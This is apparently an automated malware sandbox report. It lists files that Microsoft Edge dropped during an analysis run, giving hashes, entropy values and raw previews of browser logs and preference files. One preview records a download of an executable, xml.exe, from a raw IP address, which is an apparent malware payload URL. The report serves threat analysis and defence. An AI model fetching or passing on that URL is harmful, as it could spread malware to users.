              Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f.................&f.................s.0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=............... 3.A;...............#38_h.......6.Z..W.F..............................;...............#38_h.......6.Z..W.F......./......./.....$....BO..................021_download,cb218132-17d2-423a-86a6-86d0712f79a6......$cb218132-17d2-423a-86a6-86d0712f79a6................"...'http://213.109.202.222/download/xml.exe.."'http://213.109.202.222/download/xml.exe*.0.B.J.P...Z.application/octet-streamb.application/octet-streamj.........r.........x..................................................................................... .. .................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):321
              Entropy (8bit):5.238114896994747
              Encrypted:false
              SSDEEP:
              MD5:259F16E9F070917AFCA6D121D3E195CF
              SHA1:FAC3EF906F6FBFFFC3428C9E5412A1AFA2190848
              SHA-256:E68EA765297B41199B4A5ADC4996993FE5890522E8608E51BFFBDAEBD96434C1
              SHA-512:06A6DC4A40EFF1BA86A44220570C0580151E6CE7C7CE7ED2D7BBE7B2C46DC7AE82F8BD171CD8E3564E29C59D3AFCA34DD569D3F8225FA3ED19C5F0AC937932E0
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.472 9d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/02/29-11:57:29.474 9d8 Recovering log #3.2024/02/29-11:57:29.476 9d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):821
              Entropy (8bit):4.0448338863188615
              Encrypted:false
              SSDEEP:
              MD5:779E5DACEF226AC699FE40BF126500A3
              SHA1:8B2A479A2C00008C424C9F58D9F0ACF81DB3025F
              SHA-256:7AE3C20095E88D1D03F6348C32E8640E63393A39FA3E6465B5022922C8953D83
              SHA-512:B601168785A98E67F69B958F5C5DC4C74F057E84E7407DA75F5BF8683FA1667033CF73E88E687C1E94C50FDA89B40BB93282FDD512C506A9FC4AFCFB149ED331
              Malicious:false
              Reputation:unknown
              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_......Q...................20_.......w<.................20_.......ln.................19_......Y...................18_.....%.{..................9_.....f..U.................9_..........................37_.....9 '<.................38_........J.................39_.....I.Ha.................37_......m.}.................38_..........................39_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):339
              Entropy (8bit):5.229775413484025
              Encrypted:false
              SSDEEP:
              MD5:674CCC05D48433E9E87D61D21F5163C7
              SHA1:B22BB17F2613B203B265F79133351A4D7AD718D3
              SHA-256:EA29EE80D960D2569F162840E399E829B10EC6316A02A97A270B34F6DAD497A9
              SHA-512:6C13F903F366BDA6A1813AD2AF1F96A4E5B363FDF5842A7B7C916FC53B5527D2CBA715A5C24A56E2BE4B3AC18707B56E5848A88321EF57FBEE6ECE9E4788173A
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:29.459 9d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/02/29-11:57:29.461 9d8 Recovering log #3.2024/02/29-11:57:29.466 9d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):120
              Entropy (8bit):3.32524464792714
              Encrypted:false
              SSDEEP:
              MD5:A397E5983D4A1619E36143B4D804B870
              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
              Malicious:false
              Reputation:unknown
              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):13
              Entropy (8bit):2.7192945256669794
              Encrypted:false
              SSDEEP:
              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
              Malicious:false
              Reputation:unknown
              Preview:117.0.2045.47
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:698EEFDAC591368102ACC7CBFBEEBE00
              SHA1:501D5D6F1FFACDC7AB7F5062FDFF264372DD6B22
              SHA-256:E9D9CAF99FD51502C1C4844EF78C43D3F6604A50504FB5951C23E8658256B33C
              SHA-512:72C79F47A5C92D4AA375F3FAC0DACF4EACBBFF01D96404654F4126D39EE0AC89B148C6D6C82871E26F03BF67EA8718B6D92F07852345C63BAC6061708B358F51
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):0.6111597644407213
              Encrypted:false
              SSDEEP:
              MD5:1B30AF3C48C2AABF031B1C94AED4240C
              SHA1:7A045239947E06996A05E91640A22C3CABFB3EFB
              SHA-256:3ED5CEE21B6C34189F3A5316718FD5407A8B626BD6FD8CD5CA4288B733B209E9
              SHA-512:C125F94C34724006009BD84E0B6D79666913F0372469D8C0AA741575C8A2133350171CB24F63D489BFA799DBF1B76A1CFC3DDC6498EEDBFE2AC48C01C740ECA6
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:461653126C34690FC0ECA4FADEB86371
              SHA1:8344C0F3FA4585636C7F84EBD7753808A13D9475
              SHA-256:887AD3D5E35E01663B16DD17163C96DBE71C28823A85308E33E40AB8DF94C22F
              SHA-512:1D2BF65796910BE78B74B28C54CA48BA04F3D0AF4B8BDCD7BC18E8ECAD6EDBA7FB68F5B7B43FADC65F1C2810B307E367C0EE5727760959BDFCB58B8C27404385
              Malicious:false
              Reputation:unknown
              Preview:......... .*.......... ....aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):2081873
              Entropy (8bit):4.001486542599299
              Encrypted:false
              SSDEEP:
              MD5:461653126C34690FC0ECA4FADEB86371
              SHA1:8344C0F3FA4585636C7F84EBD7753808A13D9475
              SHA-256:887AD3D5E35E01663B16DD17163C96DBE71C28823A85308E33E40AB8DF94C22F
              SHA-512:1D2BF65796910BE78B74B28C54CA48BA04F3D0AF4B8BDCD7BC18E8ECAD6EDBA7FB68F5B7B43FADC65F1C2810B307E367C0EE5727760959BDFCB58B8C27404385
              Malicious:false
              Reputation:unknown
              Preview:......... .*.......... ....aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):47
              Entropy (8bit):4.3818353308528755
              Encrypted:false
              SSDEEP:
              MD5:48324111147DECC23AC222A361873FC5
              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
              Malicious:false
              Reputation:unknown
              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
